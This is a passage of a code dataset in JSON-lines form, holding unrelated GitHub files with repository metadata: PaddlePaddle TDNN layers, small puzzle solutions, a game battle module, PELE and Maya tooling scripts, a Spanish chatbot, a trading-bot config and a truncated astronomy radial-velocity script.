Defaults to \"reflect\".\n \"\"\"\n super().__init__()\n\n self.kernel_size = kernel_size\n self.stride = stride\n self.dilation = dilation\n self.padding = padding\n self.padding_mode = padding_mode\n\n self.conv = nn.Conv1D(\n in_channels,\n out_channels,\n self.kernel_size,\n stride=self.stride,\n padding=0,\n dilation=self.dilation,\n groups=groups,\n bias_attr=bias, )\n\n def forward(self, x):\n if self.padding == \"same\":\n x = self._manage_padding(x, self.kernel_size, self.dilation, self.stride)\n else:\n raise ValueError(\"Padding must be 'same'. Got {self.padding}\")\n\n return self.conv(x)\n\n def _manage_padding(self, x, kernel_size: int, dilation: int, stride: int):\n L_in = x.shape[-1] # Detecting input shape\n padding = self._get_padding_elem(L_in, stride, kernel_size, dilation) # Time padding\n x = F.pad(x, padding, mode=self.padding_mode, data_format=\"NCL\") # Applying padding\n return x\n\n def _get_padding_elem(self,\n L_in: int,\n stride: int,\n kernel_size: int,\n dilation: int):\n if stride > 1:\n n_steps = math.ceil(((L_in - kernel_size * dilation) / stride) + 1)\n L_out = stride * (n_steps - 1) + kernel_size * dilation\n padding = [kernel_size // 2, kernel_size // 2]\n else:\n L_out = (L_in - dilation * (kernel_size - 1) - 1) // stride + 1\n\n padding = [(L_in - L_out) // 2, (L_in - L_out) // 2]\n\n return padding\n\n\nclass BatchNorm1d(nn.Layer):\n def __init__(\n self,\n input_size,\n eps=1e-05,\n momentum=0.9,\n weight_attr=None,\n bias_attr=None,\n data_format='NCL',\n use_global_stats=None, ):\n super().__init__()\n\n self.norm = nn.BatchNorm1D(\n input_size,\n epsilon=eps,\n momentum=momentum,\n weight_attr=weight_attr,\n bias_attr=bias_attr,\n data_format=data_format,\n use_global_stats=use_global_stats, )\n\n def forward(self, x):\n x_n = self.norm(x)\n return x_n\n\n\nclass TDNNBlock(nn.Layer):\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size,\n dilation,\n activation=nn.ReLU, ):\n \"\"\"Implementation of TDNN network\n\n Args:\n in_channels (int): input channels or input embedding dimensions\n out_channels (int): output channels or output embedding dimensions\n kernel_size (int): the kernel size of the TDNN network block\n dilation (int): the dilation of the TDNN network block\n activation (paddle class, optional): the activation layers. 
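The block applies the convolution, then this activation, then batch norm. 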
Defaults to nn.ReLU.\n \"\"\"\n super().__init__()\n self.conv = Conv1d(in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n dilation=dilation, )\n self.activation = activation()\n self.norm = BatchNorm1d(input_size=out_channels)\n\n def forward(self, x):\n return self.norm(self.activation(self.conv(x)))\n","repo_name":"yeyupiaoling/VoiceprintRecognition-PaddlePaddle","sub_path":"ppvector/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"67"} +{"seq_id":"74907837332","text":"# Power of Cryptography\n\nimport math\n\n\ndef k(n, p):\n return round(math.pow(math.e, math.log(p) / n))\n\n\ndef main():\n while True:\n try:\n n = int(input())\n p = int(input())\n except EOFError:\n break\n else:\n print(k(n, p))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jrmanrique/codingproblems","sub_path":"uvaonlinejudge/python/p113.py","file_name":"p113.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43923467629","text":"__author__ = 'Sam'\nfrom random import randint\nfrom src.common.GameWorld import *\n\ndef simpleBattle(army,city):\n #print \"Simple Battle Commencing\"\n armyPWR = army.size\n cityPWR = city.defense + city.importanceBehavior.importance()\n ###STRATEGY PATTERN####\n #print city.defense\n #print city.importanceBehavior.importance()\n\n total = randint(0,(armyPWR+cityPWR))\n winner = city\n loser = army\n if total > cityPWR:\n winner = army\n loser = city\n city.control = army\n winner.size = winner.powerState.setSize(total - cityPWR)\n #print city.name,\"has been taken!\"\n #print winner.name,\"now has \",winner.size,\"troops left\"\n else:\n army.size = 0\n #print loser.name,\"was unable to take the city\"\n\ndef siegeBattle(army1,army2,city):\n #print \"Siege Battle Commencing\"\n if army1.control == army2.control:\n raise TypeError(\"Armies are on the same team\")\n if city.control == army1:\n defender = army1\n attacker = army2\n else:\n defender = army2\n attacker = army1\n defensePWR = defender.size + city.defense + city.importanceBehavior.importance()\n attackPWR = attacker.size\n total = randint(0,(defensePWR+attackPWR))\n winner = defender\n loser = attacker\n if total > defensePWR:\n winner = attacker\n loser = defender\n winner.size = winner.powerState.setSize(total-loser.size)\n loser.size = 0\n #print loser.name,\"has been defeated, \",city.name,\"has been taken!\"\n #print winner.name, \"now has \", winner.size, \"troops left\"\n city.control = winner\n else:\n loser.size = 0\n winner.size = winner.powerState.setSize(total)\n #print loser.name,\"has been defeated\"\n #print winner.name, \"now has \", winner.size, \"troops left\"\n\ndef cityBattle(army,city):\n #print \"City Battle Commencing\"\n armyPWR = army.size\n cityPWR = city.defense\n total = randint(0,(armyPWR+cityPWR))\n winner = city\n loser = army\n if total > cityPWR:\n winner = army\n loser = city\n city.control = army\n winner.size = winner.powerState.setSize(total - cityPWR)\n #print city.name,\"has been taken!\"\n #print winner.name,\"now has \",winner.size,\"troops left\"\n else:\n army.size = 0\n #print loser.name,\"was unable to take the city\"\n\n\n\n\n\n\n","repo_name":"satello/work-samples","sub_path":"University of Oregon Coursework/Intro to Computer Science/GOT 
Game/src/common/battleDriver.py","file_name":"battleDriver.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2818650938","text":"# -*- coding: utf-8 -*-\n\n# Global imports\nfrom __future__ import unicode_literals\nimport os\nimport glob\nimport argparse as ap\nimport pandas as pd\nimport numpy as n\n\n# Local imports\nfrom PELEParseReports import *\n\n# Script information\n__author__ = \"Sergi Rodà\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n__maintainer__ = \"Sergi Rodà\"\n__email__ = \"sergi.rodallordes@bsc.es\"\n\n# Functions\ndef parseArgs():\n \"\"\"\n Parse arguments from command-line\n\n RETURNS\n -------\n reports : string\n list of report files to look for data\n output_path : string\n output directory where the csv file will be saved\n column : list of indices\n list of column indices\n \"\"\"\n\n parser = ap.ArgumentParser(description='Script that returns a csv file with the mean of the numerical \\\n metrics of the reports file from a PELE simulation')\n optional = parser._action_groups.pop()\n required = parser.add_argument_group('required arguments')\n required.add_argument(\"-i\", \"--input\", required=True, metavar=\"FILE\",\n type=str, nargs='*', help=\"path to report files\")\n optional.add_argument(\"-o\", \"--output\", metavar=\"PATH\", type=str,\n help=\"output path to save figure\", default=\"PELE_results\")\n optional.add_argument(\"-C\",\"--column\", metavar=\"LIST\",type=str,\n nargs='*',help=\"index of the column where the filtering will be applied\")\n parser._action_groups.append(optional)\n args = parser.parse_args()\n\n reports = parseReports(args.input, parser)\n\n output_path, column = args.output, args.column\n\n if column is not None:\n column = [int(i)-1 for i in column]\n\n return reports, output_path, column\n\n\ndef Storeresults(reports,CE, output_path):\n \"\"\"\n Take the PELE simulation report files and returns the filtered report files\n\n OUTPUT\n ------\n filtered report files according to some specified filters in some columns\n \"\"\"\n\n if not os.path.exists(os.path.join(os.getcwd(), \"Filtered_reports\")):\n os.mkdir(os.path.join(os.getcwd(), \"Filtered_reports\"))\n Report_path= os.path.join(os.getcwd(), \"Filtered_reports\")\n\n for i,report in enumerate(reports):\n df = pd.read_csv(report,sep=\" \")\n\n df_aux = df[(df[df.columns[CE[0]]].between(0,100)) & (df[df.columns[CE[1]]].between(-30,-10))]\n df_aux.to_csv(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\"))\n\n report = open(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\"),\"r\")\n report_def = open(os.path.join(Report_path,output_path+\"f_\"+str(i+1)+\".out\"),\"w\")\n\n for line in report:\n report_def.write(\" \".join(line.split(\",\")[1:]))\n\n os.system(\"rm {}\".format(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\")))\n os.system(\"mv {} {}\".format(os.path.join(Report_path,output_path+\"f_\"+str(i+1)+\".out\"),\n os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\")))\n\n\ndef main():\n \"\"\"\n Main function\n\n It is called when this script is the main program called by the interpreter\n \"\"\"\n\n # Parse command-line arguments\n reports, output_path, catalytic_event = parseArgs()\n\n # Store the filtered report files\n Storeresults(reports,catalytic_event, output_path)\n\n\nif __name__ == \"__main__\":\n \"\"\"Call the main function\"\"\"\n 
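# parse arguments, filter every report on the two metric columns, and write the filtered copies\n    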
main()\n","repo_name":"SergiR1996/PELEAnalysis-Processing","sub_path":"PELEAnalysis-Processing/PELE_scripts/PELEFilterResults.py","file_name":"PELEFilterResults.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15500196023","text":"# Write your code here\nimport math\nfrom collections import defaultdict\n \nn, q = map(int, input().strip().split())\narr = list(map(int, input().strip().split()))\n \nfactors = defaultdict(list)\nfor i in range(n):\n num = arr[i]\n count = int(math.sqrt(num)) + 1\n divisible = set()\n for j in range(1, count):\n if num % j == 0:\n divisible.add(j)\n divisible.add(num // j)\n for j in divisible:\n factors[j].append(i)\n \nfor _ in range(q):\n index, x = map(int, input().strip().split())\n index = index - 1\n factors_x = factors[x]\n ln = len(factors_x)\n if not ln:\n print(0)\n continue\n for i in range(ln):\n if factors_x[i] >= index:\n print(ln - i)\n break\n else:\n print(0)\n","repo_name":"Chiki1601/Hackerearth-Solutions","sub_path":"Algorithms/Searching/Binary search/Query multiples.py","file_name":"Query multiples.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"23576146298","text":"import os\n\nfrom Toonkit_Core.tkToolOptions.tkOptions import Options\nfrom tkMayaTools.tkMayaTool import MayaTool as Tool\n\nimport pymel.core as pc\nimport tkMayaCore as tkc\n\n__author__ = \"Cyril GIBAUD - Toonkit\"\n\nVERSIONINFO = \"1.0.0.0\"\n\nclass ImportSkinnings(Tool):\n def __init__(self, inContext=None, inDebug=False):\n super(ImportSkinnings, self).__init__(inName=\"Import skinnings\", inDescription=\"Import skinnings from a '.txt' file exported from 'Export skinnings', eventually using fusion modes\",\n inUsage=\"Select some meshes and run, and eventually joints to skip when using overwrite mode\", inVersion=VERSIONINFO, inContext=inContext, inDebug=inDebug, inOptions=None)\n\n self.options = Options(inPath=self.getOptionsPath())\n self.options.addOption(\"Overwrite\", False, \"When checked, will import skinning only on unnormalized areas and/or through influences that are not selected\", \"Overwrite\")\n self.options.addOption(\"Opacity\", 1.0, \"Blending with current envelope\", \"Opacity\")\n self.options.addOption(\"Normalize\", True, \"Normalize envelope\", \"Normalize\")\n self.options.addOption(\"MappingPath\", \"\", \"Mapping file path\", \"Mapping\")\n\n if not self.options.isSaved():\n self.saveOptions()\n\n def execute(self, *args, **kwargs):\n super(ImportSkinnings, self).execute(*args, **kwargs)\n\n sel = pc.selected()\n joints = pc.ls(sel, type=\"joint\")\n\n zeroInfs = None\n if len(joints) > 0:\n sel = [s for s in sel if s not in joints]\n zeroInfs = [n.stripNamespace() for n in joints]\n\n mode = 0\n if self.options[\"Opacity\"] < 1.0:\n mode = 3\n elif self.options[\"Overwrite\"]:\n mode = 1\n\n inPath = None\n inPath = pc.fileDialog2(caption=\"Load your envelopes\", fileFilter=\"Text file (*.txt)(*.txt)\", dialogStyle=1, fileMode=1)\n\n if inPath != None and len(inPath) > 0:\n inPath = inPath[0]\n\n mapping = None\n\n if not self.options[\"MappingPath\"] is None and os.path.isfile(self.options[\"MappingPath\"]):\n lines = []\n\n with open(self.options[\"MappingPath\"]) as f:\n lines = f.readlines()\n\n if len(lines) > 0:\n mapping = {}\n\n for line in lines:\n key, value = line.rstrip(\"\\r\\n\").split(\",\")[0:2]\n mapping[key] = 
value\n\n tkc.loadSkins(inPath, sel, inZeroInfs=zeroInfs, inMode=mode, inOpacity=self.options[\"Opacity\"], inNormalize=self.options[\"Normalize\"], inRemapDict=mapping)","repo_name":"CyrilToonkit/Toonkit_Module_Base","sub_path":"Maya/scripts/tkMayaTools/ImportSkinnings.py","file_name":"ImportSkinnings.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"73343501334","text":"import torch\n\ndef flat_params(m):\n flat_data = []\n for p in m.parameters():\n flat_data.append(p.data.view(-1))\n return torch.cat(flat_data)\n\ndef grad_norm(model):\n total_norm = 0\n for p in model.parameters():\n param_norm = p.grad.detach().data.norm(2)\n total_norm += param_norm.item() ** 2\n return total_norm.cpu() ** 0.5\n\ndef zero_gradients(x):\n if x.grad is not None:\n \tx.grad.zero_()\n\ndef get_lr(optimizer):\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef compute_jacobian(inputs, output):\n\t\"\"\"\n\t:param inputs: Batch X Size (e.g. Depth X Width X Height)\n\t:param output: Batch X Classes\n\t:return: jacobian: Batch X Classes X Size\n\t\"\"\"\n\tassert inputs.requires_grad\n\n\tnum_classes = output.size()[1]\n\n\tjacobian = torch.zeros(num_classes, *inputs.size())\n\tgrad_output = torch.zeros(*output.size())\n\tif inputs.is_cuda:\n\t\tgrad_output = grad_output.cuda()\n\t\tjacobian = jacobian.cuda()\n\n\tfor i in range(num_classes):\n\t\tzero_gradients(inputs)\n\t\tgrad_output.zero_()\n\t\tgrad_output[:, i] = 1\n\t\toutput.backward(grad_output, retain_variables=True)\n\t\tjacobian[i] = inputs.grad.data\n\n\treturn torch.transpose(jacobian, dim0=0, dim1=1) ","repo_name":"aorvieto/noise_injection_overparam","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"32335504459","text":"from tkinter import *\nroot = Tk()\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\nimport pyttsx3\n\nplist = [ 'Hola',\n 'Hola me llamo Penélope Cruz. Mucho gusto.',\n '¿Cómo estás?',\n 'Estoy bien, gracias. 
¿Y tú?',\n '¿Cómo eres?',\n 'Yo soy alta, bronceada, talentosa, y sociable.',\n '¿Cómo son tus primos?',\n 'Mis primos son trabajadores, inteligentes, rubios, y delgados.',\n '¿Cómo son tú y tu hermana?.',\n 'Mi hermana y yo tenemos pelo largo y somos jóvenes y artísticas.',\n '¿Qué te gusta hacer?',\n 'Me gusta cantar, correr, y bailar.',\n '¿Cuál es la fecha de tu cumpleaños?',\n 'Mi cumpleaños es el veintiocho de abril.',\n '¿Cuántos años tienes?',\n 'Yo tengo cuarenta y siete años.',\n '¿Cuál es tu color favorito?',\n 'Mi color favorito es rojo.',\n '¿De dónde eres?',\n 'Yo soy de Alcobendas, España.',\n '¿Qué comes en el desayuno?',\n 'Yo como huevos, pan tostado, tocino, y fresas.',\n '¿Qué bebes en el desayuno?',\n 'Yo bebo jugo de naranja y café.'\n ]\n\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[2].id)\n\nbot = ChatBot('El robot de Penélope Cruz')\nread_only=True\ntrainer = ListTrainer(bot)\n\ntrainer.train(plist)\n\ndef bot_reply():\n question= question_field.get()\n answer=bot.get_response(question)\n text_area.insert(END, \"Tú: \" + question+'\\n\\n')\n text_area.insert(END, \"Penélope Cruz: \" + str(answer) + '\\n\\n')\n pyttsx3.speak(answer)\n question_field.delete(0, END)\n\nroot.geometry('500x570')\nroot.title('El robot de Penelope Cruz')\nroot.config(bg=\"orange\")\n\nlogo_pic = PhotoImage(file=\"Penelope Cruz.png\")\nlogo_pic_label= Label(root,image=logo_pic, bg=\"orange\")\nlogo_pic_label.pack()\n\ncenter_frame = Frame(root)\ncenter_frame.pack()\n\nscroll_bar=Scrollbar(center_frame)\nscroll_bar.pack(side=RIGHT)\n\ntext_area=Text(center_frame, font=('times new roman', 20, 'bold'), height=10, yscrollcommand=scroll_bar.set\n , wrap='word')\n\ntext_area.pack(side=LEFT)\nscroll_bar.config(command=text_area.yview)\n\nquestion_field = Entry(root, font=('verdana', 20, 'bold'))\nquestion_field.pack(pady=15, fill=X)\n\nask_pic = PhotoImage(file=\"Enviar.png\")\n\nask_button = Button(root, image= ask_pic, command=bot_reply)\nask_button.pack()\n\nroot.mainloop()\n","repo_name":"ViggoMode2021/PenelopeCruzchatbot","sub_path":"PenelopeCruzchatbot.py","file_name":"PenelopeCruzchatbot.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74208658773","text":"import logging\nimport os\nimport sys\nimport random\n\nLOG_CONFIG = {\n 'name': 'ai-trading-bridge',\n 'level': logging.INFO,\n 'stream_handler': logging.StreamHandler(sys.stdout),\n 'format': '%(asctime)s: %(module)s: %(levelname)s: %(message)s'\n}\n\nPOLLING_CONFIG = {\n # 'yahoo_interval': 3000,\n 'yahoo_interval': 60*20,\n}\n\nALPACA_CONFIG = {\n 'key_id': os.environ.get('ALPACA_KEY_ID'),\n 'secret_key': os.environ.get('ALPACA_SECRET_KEY'),\n # Change to https://api.alpaca.markets for live\n 'base_url': 'https://paper-api.alpaca.markets'\n}\n\n\nTRADING_CONFIG = {\n 'DEBUG': True\n}\n\nDISCORD_WEBHOOK = os.environ.get(\"DISCORD_TRADING_WEBHOOK\")\n\nPORT = 8080","repo_name":"FriendlyUser/ai_trading_bot","sub_path":"ai_trading_bot/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6194420713","text":"from __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nfrom astropy.io import fits\nfrom astropy.time import Time\nfrom PyAstronomy import pyasl\nfrom 
scipy import ndimage\nimport pandas as pd\nimport gaussfitter as gf\nimport BF_functions as bff\n'''\nProgram to extract radial velocities from a double-lined binary star spectrum.\nUses the Broadening Function technique.\n\nMeredith Rawls\n2014-2015\n\nBased loosely on Rucinski's BFall_IDL.pro, and uses the PyAstronomy tools.\nhttp://www.astro.utoronto.ca/~rucinski/BFdescription.html\nhttp://www.hs.uni-hamburg.de/DE/Ins/Per/Czesla/PyA/PyA/pyaslDoc/aslDoc/svd.html\n\nIn practice, you will run this twice: once to do the initial BF, and then again\nto properly fit the peaks of each BF with a Gaussian.\n\nINPUT\ninfiles: single-column file with one FITS or TXT filename (w/ full path) per line\n 1st entry must be for the template star (e.g., arcturus or phoenix model)\n (the same template is used to find RVs for both stars)\n NO comments are allowed in this file\n FUN FACT: unless APOGEE, these should be continuum-normalized to 1 !!!\nbjdinfile: columns 0,1,2 must be filename, BJD, BCV (e.g., from IRAF bcvcorr)\n top row must be for the template star (e.g., arcturus)\n (the 0th column is never used, but typically looks like infiles_BF.txt)\n one line per observation\n comments are allowed in this file using #\ngausspars: your best initial guesses for fitting gaussians to the BF peaks\n the parameters are [amp1, offset1, width1, amp2, offset2, width2]\n the top line is ignored (template), but must have six values\n one line per observation\n comments are allowed in this file using #\n\nOUTPUT\noutfile: a file that will be created with 8 columns: BJD midpoint, orbital phase,\n Kepler BJD, RV1, RV1 error, RV2, RV2 error\nbfoutfile: a file that contains all the BF function data (raw RV, BF, gaussian model)\n\nIMMEDIATELY BELOW, IN THE CODE\nYou need to specify whether you have APOGEE (near-IR) or \"regular\" (e.g., ARCES)\nspectra with the 'isAPOGEE' flag. You also need to set the binary's PERIOD and BJD0,\nboth in days, and the constant RV and BCV of whatever template you are using.\n'''\n\n##########\n# YOU NEED TO HAVE THESE INPUT FILES !!!\n# THE OUTPUT FILE WILL BE CREATED FOR YOU\n\n# typical format for RG/EB systems\n#infiles = '../../RG_spectra/9291629/infiles_arcesBF.txt'\n#bjdinfile = '../../RG_spectra/9291629/bjdinfile_arcesBF.txt'\n#gausspars = '../../RG_spectra/9291629/gaussfit_arcesBF.txt'\n#outfile = '../../RG_spectra/9291629/rvoutfile_new_arcesBF.txt'\n\n# joni's EBs\n#infiles = '../../joni_EBs/OAinfits.txt'\n#bjdinfile = '../../joni_EBs/OAbjd.txt'\n#gausspars = '../../joni_EBs/OAgauss.txt'\n#outfile = '../../joni_EBs/OAmeredith_take2.txt'\n\n# (for KIC 8848288, ie TYC 3559)\ninfiles = '../../KIC_8848288/infiles.txt'\nbjdinfile = '../../KIC_8848288/bjdfile.txt'\ngausspars = '../../KIC_8848288/gaussfit.txt'\noutfile = '../../KIC_8848288/rvs_revisited3_BF.txt'\nbfoutfile = '../../KIC_8848288/bfoutfile3.txt'\n\n# (the original infiles)\n#infiles = '../../TelFit/9246715_telfit/infiles_BF_shift.txt'\n#bjdinfile = '../../RG_spectra/9246715/bjds_baryvels.txt'\n#gausspars = '../../RG_spectra/9246715/gaussfit_pars.txt'\n#outfile = '../../RG_spectra/9246715/redo_plot_BFoutput.txt'\n\n# STUFF YOU NEED TO DEFINE CORRECTLY !!!\nisAPOGEE = False # toggle to use near-IR stuff, or not\nSpecPlot = True # toggle to plot spectra before BFs, or not\nbjdoffset = 2454833. 
# difference between real BJDs and 'bjdfunny' (truncated BJDs)\namplimits = [0.8,1, 0.05,0.2] # limits for gaussian normalized amplitude [min1,max1,min2,max2]\nthreshold = 10 # margin for gaussian position (raw RV in km/s)\nwidlimits = [0,7, 0,40] # limits for gaussian width (km/s) [min1,max1,min2,max2]\n\n# ORBITAL PERIOD AND ZEROPOINT !!!\n#period = 171.277697; BJD0 = 2455170.514777 # 9246715\n#period = 207.1082; BJD0 = 2455112.7655 # 7037405\n#period = 63.327106; BJD0 = 2454976.635546 # 8430105\n#period = 120.3903; BJD0 = 2454957.682 # 10001167\n#period = 358.08; BJD0 = 2454962.684595 # 4663623\n#period = 20.686424; BJD0 = 2454966.8914 # 9291629\n#period = 19.38446; BJD0 = 2454970.2139 # 8702921\n#period = 33.65685; BJD0 = 2454960.8989 # 3955867\n#period = 235.300; BJD0 = 2455190.53 #9970396\n#period = 1058.23; BJD0 = 2454751.806288 #8054233\n#period = 197.9182; BJD0 = 2455162.6140 #5786154\nperiod = 5.56648; BJD0 = 2454904.8038 # (8848288)\n\n# joni's OA\n#period = 40.8778427; BJD0 = 2454955.556300\n\n# RADIAL VELOCITY AND BCV INFO FOR TEMPLATE (km/s; set both to 0 if using a model !!!)\n#rvstd = -64.422; bcvstd = 10.747 # HD168009 (fullspec26), G1 V star\n#rvstd = -21.619; bcvstd = 16.571 # HD182488 (fullspec28), G9 V star\n#rvstd = -21.123; bcvstd = 12.499 # HD196850 (fullspec32), G1 V star\nrvstd = 0; bcvstd = 0 # model template\n#rvstd = 0; bcvstd = 13.5073 # joni's OA with self-template\n\n# PARAMETERS FOR THE BROADENING FUNCTION (IMPORTANT PAY ATTENTION !!!)\nsmoothstd = 1.0 #1.5 # stdev of Gaussian to smooth BFs by (~slit width in pixels)\n#w00 = 5400 # starting wavelength for new grid\n#n = 38750 # number of wavelength points for new grid\n#stepV = 1.7 # roughly 3e5 / (max_wavelength / wavelength_step) km/s, rounded down\nm = 171 # length of the BF (must be longer if RVs are far from 0)\n## good values for APOGEE:\n#w00 = 15145; n = 15000; stepV = 1.5\n#w00 = 15670; n = 2000; stepV = 1.5\n## good values for ARCES & TRES together:\n#w00 = 5400; n = 38750; stepV = 1.7\n## good values for 8848288 (HET low & high res):\n#w00 = 4408; n = 55000; stepV = 1.5\n#w00 = 4485; n = 53000; stepV = 1.5\nw00 = 4485; n = 80000; stepV = 1.5 # testing larger, redder wavelength range\n\n# STUFF TO MAKE PLOTS LOOK NICE\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.45 # 9246715\n#rvneg = -89; rvpos = 39; ymin = -0.05; ymax = 0.30 # 7037405\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.35 # 8430105\n#rvneg = -170; rvpos = 5; ymin = -0.05; ymax = 0.15 # 10001167\n#rvneg = -69; rvpos = 69; ymin = -0.05; ymax = 0.45 # 4663623\n#rvneg = -109; rvpos = 79; ymin = -0.05; ymax = 0.45 # 9291629\n#rvneg = -95; rvpos = 130; ymin = -0.05; ymax = 0.20 # 8702921\n#rvneg = -99; rvpos = 99; ymin = -0.05; ymax = 0.30 # 3955867\n#rvneg = -69; rvpos = 49; ymin = -0.05; ymax = 0.30 # 9970396\n#rvneg = -70; rvpos = 70; ymin = -0.05; ymax = 0.20 # 8054233\n#rvneg = -59; rvpos = 59; ymin = -0.05; ymax = 0.30 # 5786154\nrvneg = -64; rvpos = 24; ymin = -0.05; ymax = 1.05 #ymin = -0.15; ymax = 0.50 # (8848288)\n\n#rvneg = -49; rvpos = 99; ymin = -0.15; ymax = 0.6 # test for joni OA\n\n# some previously set values for posterity ...\n# ARCES ARCTURUS OBSERVATION\n#rvstd = 20.71053 # this is the TOTAL RV OFFSET FROM REST of the ARCES Arcturus observation\n#bcvstd = 0 # this goes with the above rvstd\n#rvstd = -5.19 # from SIMBAD, for Arcturus ... 
WRONG(ish)\n#bcvstd = -0.155355148339 # APOGEE Arcturus bcv\n#bcvstd = 18.4574 # ARCES Arcturus bcv\n##########\n\nprint('Welcome to the Broadening Function party!')\nprint('')\nprint('MAKE SURE THIS IS WHAT YOU WANT:')\nprint('You set Porb = {0} days, BJD0 = {1} days'.format(period, BJD0))\n\n# CREATE NEW SPECTRUM IN LOG SPACE\n# This uses w00, n, and stepV, defined above. The new wavelength grid is w1.\n# The BF will be evenly spaced in velocity with length m.\n# The velocity steps are r (km/s/pix).\nw1, m, r = bff.logify_spec(isAPOGEE, w00, n, stepV, m)\n\n# READ IN ALL THE THINGS\nspecdata = bff.read_specfiles(infiles, bjdinfile, isAPOGEE)\nnspec = specdata[0]; filenamelist = specdata[1]\ndatetimelist = specdata[2]; wavelist = specdata[3]; speclist = specdata[4]\n\n# INTERPOLATE THE TEMPLATE AND OBJECT SPECTRA ONTO THE NEW LOG-WAVELENGTH GRID\n# OPTION TO PLOT THIS (commented out for now)\n##plt.figure(1)\nnewspeclist = []\nyoffset = 1\nif SpecPlot == True:\n plt.axis([w1[0], w1[-1], 0, nspec+3])\n plt.xlabel(r'Wavelength ({\\AA})')\nfor i in range (0, nspec):\n newspec = np.interp(w1, wavelist[i], speclist[i])\n newspeclist.append(newspec)\n if SpecPlot == True:\n plt.plot(w1, newspec+yoffset, label=datetimelist[i].iso[0:10], color='b')\n yoffset = yoffset + 1\nif SpecPlot == True:\n ##plt.legend()\n plt.show()\n\n# BROADENING FUNCTION TIME\nsvd = pyasl.SVD()\n# Single Value Decomposition\nsvd.decompose(newspeclist[0], m)\nsingularvals = svd.getSingularValues()\nbflist = []\nbfsmoothlist = []\nfor i in range (0, nspec):\n # Obtain the broadening function\n bf = svd.getBroadeningFunction(newspeclist[i]) # this is a full matrix\n bfarray = svd.getBroadeningFunction(newspeclist[i], asarray=True)\n # Smooth the array-like broadening function\n # 1ST LINE - python 2.7 with old version of pandas; 2ND LINE - python 3.5 with new version of pandas\n #bfsmooth = pd.rolling_window(bfarray, window=5, win_type='gaussian', std=smoothstd, center=True)\n bfsmooth = pd.Series(bfarray).rolling(window=5, win_type='gaussian', center=True).mean(std=smoothstd)\n # The rolling window makes nans at the start because it's a punk.\n for j in range(0,len(bfsmooth)):\n if np.isnan(bfsmooth[j]) == True:\n bfsmooth[j] = 0\n else:\n bfsmooth[j] = bfsmooth[j]\n bflist.append(bf)\n bfsmoothlist.append(bfsmooth)\n \nbfnormlist = []\nfor a in bfsmoothlist:\n bfnormlist.append((a-np.min(a))/(np.max(a)-np.min(a)))\n\n# Obtain the indices in RV space that correspond to the BF\nbf_ind = svd.getRVAxis(r, 1) + rvstd - bcvstd\n\n# OPTION TO PLOT THE SINGULAR VALUES TO SEE WHERE THEY AREN'T A MESS\n# this probably isn't important, because instead of choosing which values to throw out,\n# we use \"Route #2\" as described by Rucinski and just use the final row of the BF array\n# and smooth it with a Gaussian to get rid of noise problems.\n# for more info, seriously, read http://www.astro.utoronto.ca/~rucinski/SVDcookbook.html\n##plt.figure(2)\n#plt.semilogy(singularvals, 'b-')\n#plt.xlabel('BF Index')\n#plt.ylabel('Singular Values')\n#plt.show()\n\n# OPTION TO PLOT THE SMOOTHED BFs\n##plt.figure(3)\nplt.axis([rvneg, rvpos, -0.2, float(nspec)/2.5])\nplt.xlabel('Radial Velocity (km s$^{-1}$)')\nplt.ylabel('Broadening Function (arbitrary amplitude)')\nyoffset = 0.0\nfor i in range(1, nspec):\n plt.plot(bf_ind, bfsmoothlist[i]+yoffset, color='b')\n yoffset = yoffset + 0.4\nplt.show()\n\n# FIT THE SMOOTHED BF PEAKS WITH TWO GAUSSIANS\n# you have to have pretty decent guesses in the gausspars file for this to work.\n#bffitlist = 
